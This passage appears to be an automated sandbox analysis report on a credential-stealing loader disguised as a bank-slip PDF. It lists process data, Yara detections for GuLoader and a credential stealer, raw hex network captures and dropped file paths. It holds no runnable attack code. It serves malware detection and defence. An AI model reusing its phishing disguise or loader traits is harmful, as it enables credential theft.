2025-02-14 18:50:16 UTC	1390	IN	Data Raw: f7 7f ea 4c 72 a5 43 a8 a4 a5 d1 86 36 e4 0b 9f 01 fa 43 99 9b 57 37 32 67 b8 44 a7 ff 10 f3 48 e4 08 86 8c 80 3d 17 35 de a1 58 08 c3 6d f6 69 f4 1b 1a 8d bc e8 3c cf 50 1b be 30 e3 2d 6d d4 ac e1 50 3c 97 c0 44 cf fe c3 09 59 9d 17 fa 8a a2 a7 27 ad a8 22 67 32 7f eb 7d 93 23 eb 02 02 b2 22 01 32 c1 1e 98 82 7b 62 b2 ce ca e5 0d a2 b8 89 c2 9f 63 9f 32 8b 96 2f 03 07 37 57 5b 1d ec cc 34 70 c7 32 3c c8 90 64 7e 1a 8a 30 4f 91 7f fa fe a2 61 a7 98 82 b0 b2 c0 bb 1b f8 12 74 10 34 c1 f9 f2 a2 9b 39 c7 4e de 4b 16 fa 0f 14 79 79 7b fc d7 3c f6 bb f9 69 0a 03 ae 7d 37 b5 00 c7 e9 e3 48 d2 5e 6f bc 5c b8 b4 9d 27 f1 75 bb 5e 4c ad ef d1 40 5b bb 7a ea 20 bd 21 33 a0 c0 ae 02 5d f1 16 5f 2d 5b 41 89 ba 30 fc d0 98 58 c5 4c 54 37 20 78 8e 20 c0 09 d2 54 32 a5 Data Ascii: LrC6CW72gDH=5Xmi<P0-mP<DY'"g2}#"2{bc2/7W[4p2<d~0Oat49NKyy{<i}7H^o\'u^L@[z !3]_-[A0XLT7 x T2
2025-02-14 18:50:16 UTC	1390	IN	Data Raw: 32 39 68 fe 74 34 ca 53 a4 58 81 b5 65 e8 0b 52 f2 2f 33 57 f4 7f 41 23 84 a3 7d ae 46 e4 6b 77 cb 3c c3 d0 2d 6f d8 9f 68 9c 6b 61 8f 7c ad 98 5f 50 32 d0 ac a0 d2 8c d1 77 93 4f 0b 1b 3b dd b0 bf e5 76 47 57 a8 9e c8 f3 0a 38 e6 a0 44 97 6a a4 7d 90 af 62 52 7f e3 16 2f a9 a5 94 16 7f 93 d0 86 25 38 a2 f6 2b e5 82 0c 11 93 5d 9a 87 29 82 d0 8a 06 33 64 c0 8b 0f 4e c2 34 d9 95 10 53 d8 97 56 18 5d 8f da 4b 71 d0 06 71 74 fd 36 31 c2 38 b4 0a e5 53 b6 3f 1e 8e 25 7a a4 a9 bb d3 4d 6d 97 fb e8 e7 62 92 83 ab 60 a0 b0 9e 78 53 ab 30 6e 2d 35 8a 25 28 77 8b bb 4d fd 46 3e c9 c8 cd 24 57 bc 5d 70 f2 6b aa 59 c0 b7 53 d9 32 4e 03 a4 e4 8f 47 8e 01 16 50 12 c2 a7 8f ca e4 95 9b 82 ec bb 17 d8 77 c3 97 81 0c 6e a9 f9 d0 a8 c3 51 41 07 bc 7f e2 f6 b4 b8 b6 ec 55 Data Ascii: 29ht4SXeR/3WA#}Fkw<-ohka\|_P2wO;vGW8Dj}bR/%8+])3dN4SV]Kqqt618S?%zMmb`xS0n-5%(wMF>$W]pkYS2NGPwnQAU
2025-02-14 18:50:16 UTC	1390	IN	Data Raw: 49 5a 5a 06 5c 82 1c 13 83 bc 11 05 40 73 37 4d 7b fd b9 9c 19 89 27 0a 43 70 45 54 fb 6c 9d bf a1 b8 73 c7 3f b6 74 8a 2c cb 5c 4f 16 58 ca 75 dc 1d 5c 6a 38 3d ac 41 35 c5 a5 f9 fd 23 b4 1b ae 9f 9a 9a 30 ae 80 68 b1 18 47 60 cf 30 e1 30 a2 51 53 87 da 5c 9a be 25 0f 6a 65 a1 95 a9 82 ea 19 84 47 d7 fb ee 26 30 1d 7f a3 e5 c5 41 33 b1 ff fa a2 a6 79 85 cd ef 4e 0f ea 66 f3 ef 59 cd 1f ba d4 6d b0 7b 7c 64 af c0 72 6a 24 03 7d a4 61 96 d9 98 aa a8 68 92 07 bd 3f c9 a1 69 1b 98 6e 81 1b 25 8b 37 c1 59 bb 5b ee 94 c0 af 92 5b 1b b0 73 a0 b8 f7 5a 8d 1a bb 2a 57 b7 59 bc b2 da 5d 95 a0 26 05 53 86 26 f8 1c 17 37 a3 9f 30 e9 ab 40 9d 04 70 6c f3 a6 16 84 04 df 4a c0 33 3e db 85 3b 3e c7 5c ec d1 b8 10 99 76 3b e5 ca d5 42 b1 ef 6c f5 ae be c8 58 7d 16 f8 49 Data Ascii: IZZ\@s7M{'CpETls?t,\OXu\j8=A5#0hG`00QS\%jeG&0A3yNfYm{\|drj$}ah?in%7Y[[sZ*WY]&S&70@plJ3>;>\v;BlX}I
2025-02-14 18:50:16 UTC	1390	IN	Data Raw: 3a 3e 78 4a f8 40 cb 52 95 4d a4 60 f2 1b 0f e1 c0 a6 0f 34 46 5f 01 ef bf e7 c3 ea 98 ea 27 23 03 18 a8 ed 35 bc cc e0 fd c3 cb 44 95 e5 bd a8 f0 34 71 20 35 1b b6 f7 7d 36 8a 80 6f f9 d9 c6 69 0f f7 3d ad 40 77 7a 45 cc 97 fe e5 c8 82 ce f6 46 2a ef 92 27 0b 8a 1c 0c 94 20 81 f2 63 c6 a1 b6 ae 91 98 34 b1 73 94 86 28 81 3a 4c f7 b8 85 52 25 c7 9a 07 c8 f2 5b e8 10 0b 42 69 2f de a2 6c 21 64 b1 56 4c fc 6f 08 34 d1 40 8e a5 58 89 2c 66 34 30 08 68 5f 8b 07 6d dc 68 f2 7b 26 b0 7f 11 d8 2d 0f d1 6f bb 2d 01 d4 19 03 33 d8 be bf 3c 05 a9 31 fa 9d f8 59 0c bb e8 60 be 3d 3f d4 bf 7b 58 d0 12 76 d3 ba 66 04 da ec 1a 6b 43 f3 50 46 56 eb b5 be c9 30 88 37 ee 39 48 73 b1 41 84 83 bd 83 26 e4 6e 55 e5 81 0f fa 54 4b a2 43 2a 76 a2 83 7a bf 95 0d 19 9d aa fb d0 Data Ascii: :>xJ@RM`4F_'#5D4q 5}6oi=@wzEF' c4s(:LR%[Bi/l!dVLo4@X,f40h_mh{&-o-3<1Y`=?{XvfkCPFV079HsA&nUTKCvz
2025-02-14 18:50:16 UTC	1390	IN	Data Raw: 82 d4 fb fb 7c c3 d7 35 e1 da b8 d2 80 73 d1 97 06 a8 de 91 82 46 6d 4e b3 43 0d c9 c5 da 15 7c fb cf 00 f0 07 ca 6e cd 54 ce de 13 9d a6 6a 9d bf 8e 00 f8 1a 83 ca 22 3f 91 3d eb af a5 6b 45 44 10 7f a1 16 08 bf 77 73 b5 d3 b4 8d b4 16 80 01 24 0f b5 e6 a9 8f 87 56 90 c7 35 3a 9b 3d 49 6d b3 ed 73 4c 27 6a 72 d8 7f e8 7b 7b bd 69 04 37 f7 3e 03 8b 52 bc 0a d5 4c bf 82 8f 5d 13 3e df 2c 3f 6e ad f7 ca c5 4a 74 82 02 5b d9 50 c3 fe 47 db 8f 88 a6 21 23 53 9d 96 86 49 d1 67 63 ff 4c 7a 23 84 77 7e 7d 92 d6 d8 10 d3 f8 3a ab 4e e4 d8 6b 61 a5 cf 4a 3f fb 37 71 d0 2e 36 76 a8 47 c8 32 90 b9 ec 5e 18 1f 9e 27 28 54 ff 90 b6 4c 52 08 28 53 e5 b4 7b 2d ac bd 9a 0f 0c f7 dc f4 e2 d4 e6 72 8b eb 0a 70 d6 ed b4 17 28 ef 56 8e 7b a0 48 cf 54 2b 89 de 46 85 fd 03 ff Data Ascii: \|5sFmNC\|nTj"?=kEDws$V5:=ImsL'jr{{i7>RL]>,?nJt[PG!#SIgcLz#w~}:NkaJ?7q.6vG2^'(TLR(S{-rp(V{HT+F
2025-02-14 18:50:16 UTC	1390	IN	Data Raw: 4e f1 27 cb 10 61 a9 ea cc 23 8c a6 cf c8 a5 eb 04 b0 84 94 07 0a c7 b1 46 63 b8 e3 33 42 90 35 5f 5d 2a c0 57 02 80 46 91 0d af 50 6c db c5 45 71 1e f3 dd 0c ec 43 30 87 d5 9d 24 8a 68 9e e8 66 c1 df 3c 0c ee c5 71 49 9c 35 eb af f8 6e fa d6 af 2b b2 19 4a 50 d9 81 29 09 b2 35 ac 78 d7 f0 e8 75 ab 8b ab 80 ce 3f a0 54 7d 10 f5 50 00 27 87 31 ab c5 a6 9b fc 77 1b ce c9 cc fe 6f 04 9f 21 bd 32 3a ee 80 08 2d a5 6b 9d 7a c4 3f c1 e8 16 15 df 75 b3 11 63 2b 0b f5 14 68 ca 9f 39 42 9c 71 aa d6 25 ce 49 83 7b d5 b4 13 c2 1b 5d 77 04 2f fe a0 39 96 96 9d 4a d9 4a 45 b6 6c bc 24 16 aa 65 82 41 d7 92 e6 6c 16 aa 2b 85 aa ac f8 ed 62 18 48 49 34 6d b4 2a 6c c1 87 bc d5 f1 1b 7b ce 4f 6d c2 87 cd 48 ae 24 63 64 3a 87 a7 2e d6 92 56 d7 23 10 b5 98 97 31 3c 79 36 32 Data Ascii: N'a#Fc3B5_]WFPlEqC0$hf<qI5n+JP)5xu?T}P'1wo!2:-kz?uc+h9Bq%I{]w/9JJEl$eAl+bHI4ml{OmH$cd:.V#1<y62
2025-02-14 18:50:16 UTC	1390	IN	Data Raw: 75 de ab e0 12 40 b8 8e aa 05 34 13 e7 88 df 46 e7 5f 47 42 6f 99 4c e6 55 a0 6e cd 6a dc 4b c4 ab 79 1e 4e 28 7d 37 b0 33 43 92 8e ab 2e 93 69 ed d0 31 b1 01 dd 4d 49 3a 73 36 c4 c5 c4 cb 0d 54 af 53 1f 0d 01 76 1d 27 d7 7e bc b9 86 3b ba 6a c3 46 59 83 73 93 c2 53 6e 74 c6 30 e3 22 d1 2c b5 25 1e 57 cd f8 8d 2a 8c 14 b7 07 a7 12 76 4d 42 6d ca f4 d8 59 94 22 f5 80 e3 ea 8c a0 54 00 81 0c d4 94 36 aa 5b ac b9 0f d9 56 b2 29 33 b7 ba 31 f0 69 b4 23 9f 8f 34 1d 7e 59 21 c1 f9 18 7f 8c 31 10 22 60 83 c2 b7 6d 91 74 f6 33 b1 de e0 51 b4 68 b8 aa 91 0c 81 d7 91 a4 32 0d 4f 19 4c d0 74 c7 37 98 5e dd 29 51 15 17 b1 30 4f 4d d9 aa 58 2c 1d 80 26 2b 6e 33 90 02 8a f7 7f 54 cb c5 d4 d2 90 f7 ba 2a 13 c1 0f ad 67 db 8f c2 ab 78 a9 07 76 8c 27 0a 8e 04 ea 84 9a 2e Data Ascii: u@4F_GBoLUnjKyN(}73C.i1MI:s6TSv'~;jFYsSnt0",%WvMBmY"T6[V)31i#4~Y!1"`mt3Qh2OLt7^)Q0OMX,&+n3Tgxv'.

Target ID:	0
Start time:	13:49:28
Start date:	14/02/2025
Path:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe"
Imagebase:	0x400000
File size:	971'664 bytes
MD5 hash:	7351C20933CDB70BB83CCE6725F74FDC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2553285117.00000000032F9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:50:03
Start date:	14/02/2025
Path:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe"
Imagebase:	0x400000
File size:	971'664 bytes
MD5 hash:	7351C20933CDB70BB83CCE6725F74FDC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2794813210.00000000340E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2768139399.0000000001BD9000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BANK SLIP_TT COPY 2-13-2024_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BANK SLIP_TT COPY 2-13-2024_pdf.exe.log

C:\Users\user\AppData\Local\Temp\nsgEB09.tmp\System.dll

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Benjoin210.une

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Bygningskonduktrens.Tok

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Mejemaskinens.Foe

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\coprodaeum.sla

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\deynt.pro

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\shelterdkket.ini

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\udgiftsfres.env

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Periodicalize\Frerhold.txt

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Periodicalize\afdelingsjordemoder.jpg

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Periodicalize\bilfragternes.txt

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\carboxyl.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Diathermance.lnk

Static File Info

Windows Analysis Report
BANK SLIP_TT COPY 2-13-2024_pdf.exe